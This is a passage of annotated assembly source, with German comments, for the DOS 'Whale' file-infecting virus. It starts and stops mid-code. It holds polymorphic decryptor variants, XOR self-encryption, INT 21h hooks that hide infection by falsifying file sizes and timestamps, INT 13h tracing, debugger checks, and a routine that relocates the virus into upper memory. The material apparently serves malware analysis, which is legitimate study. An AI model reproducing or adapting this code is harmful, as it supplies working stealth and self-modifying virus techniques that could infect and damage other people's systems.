XOR AX,AX ; AX = 0 +J03F83: POP DX ; DX = + PUSH DX +J03F85: RETN ; JMP 2831 +;--------------------------------------------------------------- +J03F86: POP DX ; + POP BX + POP CX +J03F89: + CALL_INT21 7,mut_7 + XLAT ; MOV AL,[BX+AL] + CLC +J03F8E: JMP J03F5A +;===================================================================== +;===================================================( MUTANT # 12 )=== +;===================================================================== +mut_12 EQU $ + JMP SHORT J03FA0 ; = OFFSET 4BB5 + +J03F92: POP BX + MOV AH,40h + POP CX + CALL_INT21 12,mut_12 +;========================================================== +J03F99: JMP SHORT J03FA7 + +J03F9B: POP BX + PUSH CS + POP DS + PUSH BX + RETN + +J03FA0: CALL J03FCC + JNZ J03FA0 + JMP J03F92 + + ;-------( einsprung )-------------- +J03FA7: CALL J03F9B +J03FAA: MOV CX,239Fh ; BX = ; DS = CS + SUB BX,CX ; CX = + SUB CX,+1Ah ; CX = +J03FB2: CALL J03FCC + JNZ J03FB2 + XOR BYTE Ptr DS:[BX+008Eh],01h + JZ J03FCB + CALL J03F9B +J03FC1: SUB BX,23B4h ; BX = , BX <- + DEC BX ; BX = + MOV AX,CX + PUSH BX ; + PUSH ES + POP DS +J03FCB: RETN ; = JMP 2831 + +J03FCC: PUSH [BX] + POP AX + XOR [BX+02h],AL + XOR [BX+01h],AL + ADD BX,+03h + SUB CX,+03h + RETN +;===================================================================== +;===================================================( MUTANT # 11 )=== +;===================================================================== +Mut_11 EQU $ + JMP SHORT J03FEC ; = OFFSET 4BB5 + +J03FDE: POP BX + POP CX + MOV AH,40h + CALL_int21 11,mut_11 + JMP SHORT J03FF3 + +J03FE7: POP BX + PUSH BX + PUSH CS + POP DS +J03FEB: RETN + +J03FEC: CALL J04019 + JNZ J03FEC + JMP J03FDE + + ;-------( einsprung )-------------- +J03FF3: CALL J03FE7 +J03FF6: MOV AX,239Fh ; BX = + SUB BX,AX ; BX = + MOV CX,001Ah ; CX = + XOR CX,AX ; CX = 2385 +J04000: CALL J04019 + JNZ J04000 + XOR BYTE Ptr DS:[BX+008Eh],01h + JZ J03FEB + CALL J03FE7 +J0400F: SUB BX,23B7h ; BX <- + PUSH BX ; RET + PUSH ES + MOV AX,CX + POP DS + RETN + +J04019: MOV AH,[BX] + XOR [BX+01h],AH + XOR [BX+02h],AH + ADD BX,+03h + SUB CX,+03h + RETN +;===================================================================== +;====================================================( MUTANT # 14)=== +;===================================================================== +Mut_14 EQU $ + JMP SHORT J04042 ; = OFFSET 4BB5 + +J0402A: POP AX + MOV BX,AX + POP AX + PUSH SI + MOV CX,AX + PUSH word ptr DS:[@INT21] + MOV AX,4000h ; Schreiben ! + + POP SI + CALL SI ; CALL INT 21h + POP SI + STC + NOP + CLC + ;-------( einsprung )-------------- + JMP J04049 + +J04042: INC BYTE Ptr DS:[BX] + INC BX + LOOP J04042 + JMP J0402A + +J04049: CALL J0406E + MOV CX,Code_Len + SUB BX,23A9h +J04053: DEC BYTE Ptr DS:[BX] + INC BX + LOOP J04053 + + PUSH BP + MOV BP,BX + ADD BP,008Eh + XOR AX,AX + CMP BYTE PTR [BP+00h],01h + POP BP + JZ J04072 + PUSH ES + POP DS + JMP_entry 14,mut_14 + +J0406E: PUSH CS +J0406F: POP DS + POP BX + PUSH BX +J04072: RETN + + DB 0CDh +;===================================================================== +;====================================================( MUTANT # 10)=== +;===================================================================== +mut_10 EQU $ + PUSH AX + DEC CL + JMP SHORT J0408F + +J04079: MOV AL,[BX] + INC BX + MOV AH,[BX] + XCHG AL,AH + MOV [BX-01h],AL + DEC CX + MOV [BX],AH + INC BX + XOR AX,AX + DEC CX +J0408A: RETN + + ;-------( einsprung )-------------- +J0408B: PUSH CS + POP DS + JMP SHORT J040A2 + +J0408F: CALL J04079 + CLC + JNZ J0408F + POP AX + POP BX + POP CX + + PUSH BP + PUSH word ptr DS:[@INT21] + POP BP + CALL DS:BP ; CALL Int 21H + POP BP +J040A2: CALL J040A5 +J040A5: MOV CX,2384h ; CX = 2384 + POP BX ; BX = 40A5 + SUB BX,23B6h ; BX = 1cef +J040AD: CALL J04079 + JNZ J040AD + CMP BYTE Ptr DS:[BX+008Fh],01h + CLD + JZ J0408A + PUSH ES +J040BB: POP DS + JMP_ENTRY 10,mut_10 + DB 089h +;===================================================================== +;====================================================( MUTANT # 29)=== +;===================================================================== +Mut_29 EQU $ + DEC CX ; = OFFSET 4BB5 + PUSH AX + JMP SHORT J040DB + +J040C4: MOV AL,[BX] + INC BX + MOV AH,[BX] + XCHG AH,AL + MOV [BX-01h],AL + MOV [BX],AH + INC BX + XOR AX,AX + SUB CX,+02h +J040D6: RETN + + ;-------( einsprung )-------------- +J040D7: PUSH CS + POP DS + JMP SHORT J040F0 + +J040DB: CALL J040C4 + JNZ J040DB + POP AX + POP BX + STI + + POP CX + PUSH word ptr DS:[@INT21] + POP word ptr DS:[D259A] + CALL WORD PTR DS:[D259A] ; CALL INT 21H +J040F0: CALL J040F3 +J040F3: POP BX ; BX = + SUB BX,23B8h ; BX = + MOV CX,2384h ; CX = 2384 +J040FB: CALL J040C4 + JNZ J040FB + CMP BYTE Ptr DS:[BX+008Fh],01h + JZ J040D6 +J04107: PUSH ES + POP DS + JMP_ENTRY 29,mut_29 +;===================================================================== +;====================================================( MUTANT # 15)=== +;===================================================================== +mut_15 EQU $ + PUSH DX ; = OFFSET 4BB5 + MOV DH,[BX-01h] + PUSH AX +J04111: MOV DL,[BX] + DEC DH + XOR [BX],DH + XCHG DH,DL + ADD BX,+01h + LOOP J04111 + POP CX + POP AX + JMP J04128 + + ;-------( einsprung )-------------- +J04123: CALL J04126 +J04126: JMP SHORT J04135 + +J04128: MOV DX,AX + POP AX + MOV BX,AX + POP AX + XCHG AX,CX + + CALL DS:[@INT21] ; CALL INT 21 + JMP J04123 + +J04135: POP BX ; BX = + MOV CX,Code_Len ; CX = 2385 + PUSH CS + SUB BX,239Fh ; BX = + POP DS + +J0413F: MOV AL,[BX-01h] + DEC AL + XOR [BX],AL + INC BX + LOOP J0413F + CMP BYTE Ptr DS:[BX+008Eh],01h ; + JNZ J04151 + RETN + +J04151: PUSH ES + XOR AX,AX + POP DS + JMP_ENTRY 15,mut_15 +;===================================================================== +;=====================================================( MUTANT #6 )=== +;===================================================================== +mut_6 EQU $ + DEC CL ; = OFFSET 4BB5 +J0415A: XOR BYTE Ptr DS:[BX],67h + INC BX + DEC CX + INC BX + DEC CX + JNZ J0415A + + PUSH word ptr DS:[@INT21] + POP word ptr DS:[D2598+1] + POP BX + POP CX + JMP SHORT J04172 + + ;-------( einsprung )-------------- +J0416F: CALL J041A1 +J04172: CALL WORD PTR DS:[D2598+1] ; == call Int 21 + JMP J0416F + +J04178: MOV AX,0002h ; AX = 0002 + ADD BX,0DD61h ; BX = + DEC BH ; BX = + MOV CX,2184h ; CX = 2184 + PUSH CS + XOR CH,AL ; CX = 2386 + POP DS + +J04188: XOR BYTE Ptr DS:[BX],67h + DEC CX + ADD BX,AX ; Jedes 2 byte verXORen + DEC CX + JNZ J04188 ; 11C3 (!!!) mal :) + + ADD BX,008Fh ; BX = + DEC BYTE Ptr DS:[BX]; + PUSH ES + POP DS + JNZ J0419C ; <- BX+8E + RETN + +J0419C: MOV AX,CX + JMP_ENTRY 6,mut_6 + +J041A1: POP BX + JMP J04178 +;===================================================================== +;====================================================( MUTANT # 25)=== +;===================================================================== +mut_25 EQU $ + DEC CX ; = OFFSET 4BB5 +J041A5: XOR BYTE Ptr DS:[BX],0E8h + ADD BX,+02h + SUB CX,+02h + JNZ J041A5 + POP BX + PUSH word ptr DS:[@INT21] + POP word ptr DS:[D2598] + JMP SHORT J041BE + + ;-------( einsprung )-------------- +J041BB: CALL J041EC +J041BE: POP CX + + CALL [D2598] + JMP J041BB + +J041C5: MOV AX,0002h ; AX = 2,BX = + ADD BX,0DC61h ; BX = + MOV CX,2386h ; CX = 2386 + PUSH CS + XOR CX,AX ; CX = 2384 + POP DS +J041D3: XOR BYTE Ptr DS:[BX],0E8h + ADD BX,AX + SUB CX,AX + JNZ J041D3 + ; BX = + ADD BX,008Fh ; BX = + DEC BYTE Ptr DS:[BX] + PUSH ES + POP DS + JNZ J041E7 + RETN + +J041E7: MOV AX,CX + JMP_entry 25,mut_25 + +J041EC: POP BX + JMP J041C5 + + db 33h +;===================================================================== +;=====================================================( MUTANT #4 )=== +;===================================================================== +mut_4 EQU $ + PUSH DX ; = OFFSET 4BB5 + MOV DH,[BX-01] +J041F4: MOV DL,[BX] + XOR [BX],DH + XCHG DH,DL + ADD BX,+01h + LOOP J041F4 + POP DX + STI + POP BX + POP CX + + CALL DS:[@INT21] ; CALL Int 21 + ;----( einsprung )---- + CALL J0420D +J0420A: INC AX + XOR BX,SI +J0420D: OR SI,SI + INC BH + POP BX ; BX = + SUB BX,23A1h ; BX = + ADD BX,+02h ; BX = + MOV CX,2485h + DEC CH ; CX = 2385 + PUSH CS + POP DS +J04220: MOV AL,[BX-01h] + XOR [BX],AL + INC BX + LOOP J04220 + ; BX = + ADD BX,008Eh ; BX = + XCHG BX,SI + DEC BYTE Ptr DS:[SI] + JNZ J04235 + XCHG SI,BX + RETN + +J04235: PUSH ES + XOR AX,AX + POP DS + JMP_ENTRY 4,mut_4 +;===================================================================== +;====================================================( MUTANT #13 )=== +;===================================================================== +mut_13 EQU $ + PUSH DX ; = OFFSET 4BB5 + MOV DH,[BX-01h] +J04240: MOV DL,[BX] + ADD [BX],DH + XCHG DL,DH + INC BX + LOOP J04240 + + POP DX + POP BX + POP CX + PUSH SI + MOV SI,2567h + + DEC SI + CALL [SI] + ;--------( einsprung ) ------ + CALL J04258 + XOR BX,SI +J04258: XOR SI,1876h + POP BX + POP SI + SUB BX,Code_start ; BX = 2830 + MOV CX,Code_Len ; CX = 2385 wal-size + PUSH CS + POP DS +J04267: MOV AL,[BX-01h] + SUB [BX],AL + INC BX + LOOP J04267 + ADD BX,008Eh + XCHG SI,BX + DEC BYTE Ptr DS:[SI] + JNZ J0427C + XCHG BX,SI + RETN + +J0427E equ $+3 ; SPRUNGZIEL FR M#19, zeigt auf L0L0L0 +J0427C: PUSH ES + XOR AX,AX + POP DS + JMP_ENTRY 13,mut_13 + + DW 0CE8BH + DW 05605H + DB 34H +;===================================================================== +;====================================================( MUTANT # 19)=== +;===================================================================== +mut_19 EQU $ + PUSH AX ; = OFFSET 4BB5 +J04289: XOR BYTE Ptr DS:[BX],05h + INC BYTE Ptr DS:[BX] + INC BX + LOOP J04289 + POP AX + INC BX + INC CX + STD + STC + PUSH AX + XLAT ; MOV AL,[BX+AL] + POP AX + POP BX + POP CX + + CALL DS:[@INT21] ; CALL INT 21h + ;-------( einsprung )-------------- + CALL J042A5 + +J042A2: MOV BX,5601h +J042A5: POP BX ; BX = + SUB BX,239Fh ; BX = + MOV CX,8934h + MOV CX,code_len ; CX = 2385 + PUSH CS + PUSH AX + MOV AX,0000h + MOV DS,AX + POP AX + POP DS ; DS=CS ! +J042B9: DEC BYTE Ptr DS:[BX] + XOR BYTE Ptr DS:[BX],05h + INC BX + LOOP J042B9 + MOV CX,0023h + DEC BYTE Ptr DS:[BX+008Eh] + JZ J0427E + + PUSH ES + MOV CX,0000h + POP DS + JMP_ENTRY 19,mut_19 + + DW 0FBC3h +;===================================================================== +;=====================================================( MUTANT #2 )=== +;===================================================================== +Mut_2 EQU $ + PUSH AX ; = OFFSET 4BB5 + XLAT ; MOV AL,[BX+AL] +J042D6: XOR BYTE Ptr DS:[BX],10h + ADD BX,+01h + LOOP J042D6 + POP AX + POP BX + POP CX + PUSH SI + MOV SI,Offset @INT21 + CLC + + CALL [SI] ; CALL Int 21 + CLC + POP SI + INC BX + ;-------( einsprung )-------------- + CALL J04317 + +J042EE: SUB BX,239Fh ; BX = + MOV CX,2387h + DEC CX + STC + DEC CX ; CX = 2385 + +J042F8: XOR BYTE Ptr DS:[BX],10h + ADD BX,+01h + LOOP J042F8 + ; BX = + MOV CX,BX + MOV CX,008Eh + ADD BX,CX ; BX = + DEC BYTE Ptr DS:[BX] + JZ J0430D + JMP SHORT J0430E + +J0430D: RETN + +J0430E: PUSH ES + MOV AX,0000h + POP DS + CLC + JMP_ENTRY 2,mut_2 + ;---------------- +J04317: POP BX + PUSH BX + PUSH CS + PUSH CX + STC + POP CX + POP DS + CLC + RETN +;===================================================================== +;======================================================( MUTANT #9)=== +;===================================================================== +Mut_9 EQU $ +J04320: ADD BYTE Ptr DS:[BX],05h ; = OFFSET 4BB5 + ADD BX,+01h + LOOP J04320 + POP BX + INC CX + POP CX + PUSH SI + MOV SI,Offset @INT21 + + CALL [SI] ; CALL INT 21 + CLC + POP SI + INC DX + PUSH AX + POP DX + NOP + ;-------( einsprung )-------------- + CALL J0433B +J0433A: CLC +J0433B: POP BX ; BX = + SUB BX,239Fh ; BX = + MOV CH,23h + MOV CL,85h ; CX = 2385 + CALL J04360 ; DS = CS + +J04347: SUB BYTE Ptr DS:[BX],05h + INC BX + CLC + ADD DX,+12h + LOOP J04347 + ADD BX,008Eh ; BX = + DEC BYTE Ptr DS:[BX] + JNZ J04364 + RETN + + INC BX + ADD CX,0D7Ah + XLAT ; MOV AL,[BX+AL] +J04360: PUSH CS + POP DS + RETN + + DB 0A4H +J04364: PUSH ES + POP DS + JMP_Entry 9,mut_9 + DB 25H + DB 26H + DB 85h +;===================================================================== +;========================================( Kodiert 1274h... 1B5Ch )=== +;========================================( == 3A84 .. 436Ch )=== +;===================================================================== +Code_3A84: MDECODE 68 +J04371: MOV BX,Offset J03A84-Offset VirStart ; 1274h + MOV CX,Offset Code_3A84-Offset J03A84 ; 08E8h +J04377: IN AL,40h + OR AL,00h + JZ J04377 + +J0437D: XOR CS:[BX],AL + INC BX + LOOP J0437D + + CALL J04386 +J04386: POP BX + ADD BX,OFFSET XORBYTE_7D - Offset J04386 ; +1E + ; GEGENSTUECK IST DORT ! + MOV CS:[BX],AL + MCODE 68 + RETN +;===================================================================== +;======================================( Dekodiert 1274h... 1B5Ch )=== +;===================================================================== +Decode_3A84: MOV BX,Offset J03A84-Offset VirStart ; 1274h + MOV CX,Offset Code_3A84-Offset J03A84 ; 08E8h + ;CALL J04984 ; wie ist es mit dem RET ??? + CALL J043A1 ; muesste CALL 43A1 heissen . + + DB 90h + DB 70h + db 90h + db 91h + db 7dh + db 73h + +J043A1: XOR BYTE PTR CS:[BX],00 ; <---- ! + +XORBYTE_7D EQU $-1 ; !!!!!!!! + + INC BX + LOOP J043A1 + RETN +;====================================================================== + DB 02eh,0c7h,006h,099h + DB 007h,000h,000h,0e8h +;================================================================== +;===========================================( Vorarbeiten )======== +;================================================================== +J043B1: MDECODE 69 + CALL Trace_int_13h + PUSH DX + MOV AH,36h ; Get free Space on Disk + MOV DL,CS:[D2428] ; DL = Disk + CALL CS:[@INT21] + MUL CX + MUL BX ; AX*BX*CX = Free space in Byte + MOV BX,DX ; DX = Total Clusters on disk + POP DX + OR BX,BX + MCODE 69 + JNZ J043DA + +J043D5: CMP AX,4000h + JB J0443D + +J043DA: MOV AX,4300h ; GET FILE-ATTRIBUT + CALL CS:[@INT21] + JB J0443D + + MDECODE 70 + MOV CS:[D24F4],DX ; Offset Filename + MOV CS:[D24F2],CX ; File-Attribut + MOV CS:[D24F6],DS ; Segment Filename + + MOV AX,4301h ; SET File-Attribut + XOR CX,CX + CALL CS:[@INT21] + CMP BYTE PTR CS:[Error],00h + + MCODE 70 + JNZ J0443D + + MOV AX,3D02h ; OPEN FILE / HANDLE + CALL CS:[@INT21] + JB J0443D + + MDECODE 71 + MOV BX,AX ; HANDLE NACH BX + PUSH BX + MOV AH,32h ; GET DISK INFO + MOV DL,CS:[D2428] ; DRIVE NR. + CALL CS:[@INT21] + MOV AX,[BX+1Eh] ; DS:BX : DISK-INFO-BLOCK + MOV CS:[D24EC],AX + POP BX + CALL J048CD + MCODE 71 + RETN + DB 0B4h +;=================================================( Fehler melden )=== +J0443D: MDECODE 72 + xor bx,bx + dec bx ; BX = 0ffffh + call J048CD + MCODE 72 + ret +;===================================================================== +;================================================( INT 24-Handler )=== +;===================================================================== +J0444D: MDECODE 73 + XOR AL,AL + MOV BYTE PTR CS:[Error],01h + MCODE 73 + IRET + DB 8Ch +;===================================================================== +;==================================( Checkt die Uhrzeit des Files )=== +;===================================================================== +CheckFileTime: MDECODE 74 + PUSH CX + PUSH DX + PUSH AX + MOV AX,4400h ; Get IOCTL-Dev.Info + CALL CS:[@INT21] ; Handle in BX + XOR DL,80h ; DL and 80h = 1: Device, + ; DL and 80h = 0: Diskfile + TEST DL,80h ; + JZ J04483 ; es war KEIN Diskfile ! + + MOV AX,5700h ; Get File-Timestamp + CALL CS:[@INT21] + TEST CH,80h ; Stunde >= 16 ? +J04483: POP AX + POP DX + POP CX + MCODE 74 + RETN + DB 0F6h +;===================================================================== +;======================( von INT 3/21h angesprungen, falls AH=40h )=== +;===================================================================== +J0448C: CMP Word PTR CS:[D2581],4 ; FILEHANDLE + JB J044BA ; KEIN FILE ! + PUSH CS + POP BX + SUB BH,20h ; 2 Segmente vor CS + MOV AX,CS:[D257B] ; AX := SAVE-DS + CMP AX,BX ; Ist SAVE-DS hher + JB J044BA ; als D257B, z.B. das + MOV CS:[D257B],BX ; DS des COMMAND.COM + JMP SHORT J044BA + DB 0E8h +;===================================================================== +;=================================( von INT 3=INT 21 angesprungen )=== +;===================================================================== +J044A9: SUB BYTE PTR CS:[SwapCode_7],52h + PUSH CS:[D2579] ; SAVE-AX + POP CX + CMP CH,40h ; WRITE File + ;============================================================= + ;durch das obige "SUB BYTE PTR CS:[1CA8h]" wird folgender Code + ;============================================================= +SwitchByte EQU $ + DB 0C6h ; aus 0c6h wird 074h, Spiel mit Queue! + DB 0D2H ; es sind genau 8 Byte dazwischen..... + ;============================================================= + ; folgendermassen verndert : + ;============================================================= + ; JZ J0448C + ;============================================================= +J044BA: + POP Word Ptr DS:[000Eh] ; INT 3 restaurieren + POP Word Ptr DS:[000Ch] + ADD BYTE PTR CS:[SwapCode_7],52h + CALL RestoreRegs + JMP J02AFB +;===================================================================== +;=================================================( Get File-Size )=== +;===================================================================== +GetFileSize: MDECODE 75 + CALL SaveRegisters + + XOR CX,CX + MOV AX,4201h ; SEEK von momentaner Position + XOR DX,DX ; 0 (!) byte weiter + CALL CS:[@INT21] + MOV Word ptr CS:[FilePos+2],DX + ; in DX:AX ist neue/alte Position + MOV Word ptr CS:[FilePos ],AX + + MOV AX,4202h ; SEEK zum File-Ende + XOR CX,CX + XOR DX,DX + CALL CS:[@INT21] + + MOV Word ptr CS:[FileSize+2],DX ; File-Laenge zurck + MOV Word ptr CS:[FileSize ],AX + + MOV AX,4200h ; SEEK zur alten Position + MOV DX,Word ptr CS:[FilePos ] + MOV CX,Word ptr CS:[FilePos+2] + CALL CS:[@INT21] + + CALL GetRegsFromVirstack + MCODE 75 + RETN +;===================================================================== +;======================================( INT 3 aus INT 21-Handler )=== +;===================================================================== +J0451A: POP AX ; POP IP + POP BX ; POP CS + POP CX ; POP Flags + JMP J044A9 +;===================================================================== +;=================================( Handler fr Get/Set Filedatum )=== +;===================================================================== +J0451F: OR AL,AL ; GET File-Date ?? + JNZ J04550 ; Nein, SET ! + ;---------------------------------( get file-date )--- + MDECODE 76 + AND WORD PTR CS:[D24B3],0FFFEH ; clear CF + CALL PopALL + CALL CS:[@INT21] + MCODE 76 + JB J04547 + TEST CH,80h ; FILE-STUNDE > 16 ? + JZ J04544 + SUB CH,80h ; Wenn ja, 16 abziehen +J04544: JMP IRET_Int21h ; INT 21 beenden + ;------------------------------------------------------ +J04547: OR WORD PTR CS:[D24B3],+01h; SET CF des Callers + JMP IRET_Int21h + ;----------------------------------( set file-date )--- +J04550: CMP AL,01h ; ist es 'set file date' ? + JNZ J045CD ; Fehler im Walcode! + ; CALL LOW-INT-21 + MDECODE 77 + AND WORD PTR CS:[D24B3],0FFFEH ; CF lschen + TEST CH,80h ; Stunde > 16 ? + MCODE 77 + JZ J0456B ; nein + SUB CH,80h ; 16 abziehen +J0456B: CALL CheckFileTime + JZ J04573 ; kein DISK-File, + ; oder Stunde < 16 + ADD CH,80h ; sonst 16 addieren + ;----------------- +J04573: MDECODE 78 + CALL CS:[@INT21] + MOV [BP-04h],AX ; Errorcode + ADC WORD PTR CS:[D24B3],+00h; = CLC + MCODE 78 + JMP J02EA3 ; fertig +;===================================================================== +;=====================================( gehrt zum INT 21-Handler )=== +;===================================================================== +J0458D: CALL SaveRegs + IN AL,21h + OR AL,02h + OUT 21h,AL + PUSH AX + MOV AX,0000h + MOV DS,AX + POP AX + PUSH Word Ptr DS:[000Ch] ; HOLE INT 3-Offset + PUSH Word Ptr DS:[000Eh] ; HOLE INT 3-Segment + PUSH CS + POP Word Ptr DS:[000Eh] ; Setze INT 3 auf + ; CS:01D0A / CS:451A + MOV WORD Ptr DS:[000Ch],OFFSET J0451A-Offset VirStart + INT 3 ; ** tricky ** +;--------------------------------------------------------------------- + DB 83h +;===================================================================== +;=====================================( Handler fr SEEK / Handle )=== +;===================================================================== +J045B2: MDECODE 79 +J045B7: CMP AL,02h ; Seek File-ENDE ?? + JNZ J045C9 ; alles andere ist uninteressant + CALL CheckFileTime ; Ja ... + JZ J045C9 + SUB WORD Ptr [BP-0Ah],Code_len + SBB WORD Ptr [BP-08h],+00h +J045C9: MCODE 79 +J045CD: JMP J02B8B ; CALL LOW-INT-21 +;===================================================================== +;=====================================================( AKTIV-MSG )=== +;===================================================================== +J045D0: MDECODE 80 + CALL PushALL + MOV AH,2Ah ; GET DATE + CALL CS:[@INT21] + ;==========( Nur zwischen 18.Februar und 21. Mrz )=== + CMP DH,02h ; MONAT FEBRUAR ? + JZ J045EC ; Ja : welcher + CMP DH,03h ; Mrz ? + JZ J045F4 ; Ja : welcher + JMP J04663 ; Nein : fertig +J045EC: CMP DL,13h ; Nach dem 18. Februar ?? + JNB J045FC ; JA -> MSG + JMP J04663 ; NEIN -> fertig + +J045F4: CMP DL,15h ; VOR 21. Mrz ?? + JB J045FC ; JA : MSG + JMP J04663 ; NEIN : Fertig +J045FC: JMP J0463D + ;======================================================== +D45FF: DB "THE WHALE IN SEARCH OF THE 8 FISH",0ah,0dh + DB "I AM '~knzyvo}' IN HAMBURG$" + ;======================================================== +J0463D: MOV AH,09h + PUSH CS + POP DS + MOV DX,Offset D45FF-Offset VirStart ; 1DFF + CALL CS:[@INT21] + ;==================================( schreibe HLT )=== + MOV WORD PTR CS:[D2598],0F4F4h ; = HLT + MOV BX,D2598 + PUSHF + PUSH CS + PUSH BX + XOR AX,AX + MOV DS,AX + MOV WORD Ptr DS:[0006h],0FFFFh + CALL Debugger_Check + ;----------------------------------------------------- +J04663: CALL PopALL + MCODE 80 + RETN +;===================================================================== +;=================================( Handler fr READ FILE /Handle )=== +;===================================================================== +J0466B: JMP J02B8B ; CALL LOW-INT-21 +J0466E: AND BYTE PTR CS:[D24B3],0FEh; CF lschen + CALL CheckFileTime + JZ J0466B ; entweder kein DISK-File, + ; oder 'falsche' Uhrzeit + MDECODE 81 + MOV CS:[D24AD],DX ; Buffer merken + MOV CS:[D24AF],CX ; Anzahl merken + MOV WORD PTR CS:[D24B1],0000h + CALL GetFileSize + MOV AX,Word ptr CS:[FileSize ] + MOV DX,Word ptr CS:[FileSize+2] + SUB AX,Code_len + SBB DX,+00h + SUB AX,Word ptr CS:[FilePos ] + SBB DX,Word ptr CS:[FilePos+2] + MCODE 81 + JNS J046B9 ; Lang genug fr den Wal + MOV WORD Ptr [BP-04h],0000h + JMP J031E7 ; fertig +;-------------------------------------------------------------------- +J046B9: MDECODE 82 + JNZ J046C8 ; JMP if Platz + CMP AX,CX ; Mehr als Wal-Lnge ? + JA J046C8 + MOV CS:[D24AF],AX ; Dann eben mehr Byte lesen, + ; als verlangt ! +J046C8: MOV CX,WORD PTR CS:[FilePos+2] + MOV DX,WORD PTR CS:[FilePos ] + OR CX,CX ; Bin ich im 1. Segment ? + + MCODE 82 + JNZ J046DF ; nein -> JMP + CMP DX,+1Ch ; wenigstens hinter + ; dem EXE-Header ? + JBE J04704 ; JMP, wenn mittendrin ! +;-------------------------------------------------------------------- +;-----------------------------------------------( lese-Schleife )---- +;-------------------------------------------------------------------- +J046DF: MDECODE 83 + MOV DX,WORD PTR CS:[D24AD] ; Lese in DS:DX + MOV AH,3Fh + MOV CX,WORD PTR CS:[D24AF] ; Soviele Byte + CALL CS:[@INT21] + ADD AX,WORD PTR CS:[D24B1] ; Gesamtzahl gelesen + MOV [BP-04h],AX + MCODE 83 + JMP J02EA3 ; fertig +;-------------------------------------------------------------------- +J04704: MOV DI,DX ; Filepos + MOV SI,DX + ADD DI,WORD PTR CS:[D24AF] ; Anzahl zu lesender byte + CMP DI,+1Ch ; Summe < 1Ch ? + JB J04717 ; JMP wenn kleiner + XOR DI,DI ; DI = 0 + JMP SHORT J0471C +;-------------------------------------------------------------------- + DB 0F7H +;-------------------------------------------------------------------- +J04717: SUB DI,01CH ; DI ist z.B. 10H. + ; SUB DI,1C : DI = FFF4 + NEG DI ; NEG DI : DI = 000B +J0471C: MDECODE 84 + MOV AX,DX + MOV DX,Word ptr CS:[FileSize ] + MOV CX,Word ptr CS:[FileSize+2] + + ADD DX,+0Fh ; Einen Paragrafen weiter + ADC CX,+00h + + AND DX,0FFEFH ; ergibt eine Rundung + ; auf volle Paragrafen + SUB DX,23FCh ; Wal-Size abziehen + SBB CX,+00h + + ADD DX,AX + ADC CX,+00h + + MOV AX,4200h ; SEEK from Start + CALL CS:[@INT21] + + MOV CX,001Ch + SUB CX,DI + SUB CX,SI + + MOV AH,3Fh ; READ FILE + MOV DX,CS:[D24AD] + CALL CS:[@INT21] + + ADD CS:[D24AD],AX + SUB CS:[D24AF],AX +J04767: ADD CS:[D24B1],AX + + XOR CX,CX + MOV AX,4200h ; SEEK from Start + MOV DX,001Ch ; zur Position 1Ch + CALL CS:[@INT21] + + MCODE 84 + JMP J046DF ; zum nchsten Teilstck +;===================================================================== +;=========================( Handler fr FindFirst/Findnext /ASCIIZ)=== +;===================================================================== +J04780: MDECODE 85 + AND WORD PTR CS:[D24B3],0FFFEH ; ZF lschen + CALL PopALL + CALL CS:[@INT21] + CALL PushALL + MCODE 85 + JNB J047A5 + OR WORD PTR CS:[D24B3],+01h +J047A0 EQU $-2 + JMP J02EA3 ; fertig + ;--------------------------; + ;J047A0: AND AL,01 ; + ; JMP J02EA3 ; + ;--------------------------; + +J047A5: CALL GetDTA + TEST BYTE Ptr DS:[BX+17h],80h + JNZ J047B7 ; infiziert. Verschleiern ! + JMP J02EA3 ; Fertig +;===================================================================== +;=====================================================( Trash !!! )=== +;===================================================================== +J047B1: CLC + INC DX + PUSH DS + POP ES + PUSH DX + JMP J047A0 ; DB 0EBH ; sind jetzt 2 Byte zuviel +;-------------------------------------( 'echter code 'berlappend )--- +J047B7: MDECODE 86 + SUB WORD Ptr DS:[BX+1Ah],Code_len + SBB WORD Ptr DS:[BX+1Ch],+00h + SUB BYTE Ptr DS:[BX+17h],80h + MCODE 86 + JMP J02EA3 ; fertig +;===================================================================== +;================================( Kopiert Wal in oberen Speicher )=== +;===================================================================== +Wal_Ins_MEMTOP_Kopieren: + MDECODE 87 + CALL J03350 ; selbsttest ! + PUSH CS ; ursprnglich "PUSH DS", + ; geht aber nicht + XOR AX,AX + MOV DS,AX + ;----------------------------------------------------- + ; INT 3 wird auf 'IRET' im IBMBIO.COM gesetzt ! + ;----------------------------------------------------- + MOV WORD PTR DS:[000Eh],0070h + MOV WORD PTR DS:[000Ch],0756h ; an Adresse 70h:756h + POP DS + MOV ES,[PSP_SEG] + PUSH ES + POP DS + SUB WORD Ptr DS:[0002h],0270h; MEM-TOP neu festlegen + MOV DX,DS ; 2700h Byte 'reservieren' + DEC DX ; SIEHE ZEICHNUNG GANZ OBEN ! + MOV DS,DX ; DS:0 zeigt auf MCB + MOV AX,WORD PTR DS:[0003h] ; Hole Size des aktuellen MCB + SUB AX,0270h ; und ziehe 2700h Byte AB + ADD DX,AX ; DX ist jetzt "MEM-TOP" + MOV WORD PTR DS:[0003h],AX ; MCB ndern + POP DI ; DI = 2947h + INC DX ; 16 Byte hher + MOV ES,DX ; ES ist ZielSegment + PUSH CS + POP DS + MOV SI,26FEh ; SI = 26FE + MOV CX,1380h ; CX = 1380h (words) + ; = 2760h (byte) + ; = bis Stackende ! + MOV DI,SI ; DI = SI + STD + XOR BX,BX ; BX = 0 + MCODE 87 + + REPZ MOVSW ; fort ist er ! + CLD ; erst jetzt ?!? + PUSH ES ; Oberes Segment + MOV AX,SchwimmZiel ; + PUSH AX ; ZIEL IST ES:01B1h + MOV ES,CS:[PSP_SEG] ; entsprechend CS:29C1h + MOV CX,WischeWeg ; CX = 236C + JMP Schwimme_Fort ; BX = 0 +;===================================================================== +;=================================================( TRACE INT 13h )=== +;===================================================================== +Trace_int_13h: MDECODE 88 + + MOV BYTE PTR CS:[Error],00h + CALL SaveRegisters + PUSH CS + + MOV AL,13h + POP DS + CALL GetInt_AL + + MOV WORD PTR DS:[Trace_Adres+2],ES + MOV WORD PTR DS:[Trace_Adres ],BX + + MOV WORD PTR DS:[@Int_13h+2],ES + MOV DL,02h + MOV WORD PTR DS:[@Int_13h ],BX + MOV BYTE PTR DS:[D2450 ],DL ; DL=2, 2 bergehen + CALL SetInt_01 + + MOV WORD PTR DS:[D24DF ],SP + MOV WORD PTR DS:[D24DD ],SS + + PUSH CS + MOV AX,Offset J0488D-Offset VirStart + PUSH AX ; RETURNADRESSE fr RETF ist + ; CS:J0207F, also CS:488D + MOV AX,0070h + MOV CX,0FFFFh ; Bis zum letzten Byte suchen ... + MOV ES,AX + XOR DI,DI + MOV AL,0CBh ; SCANNT 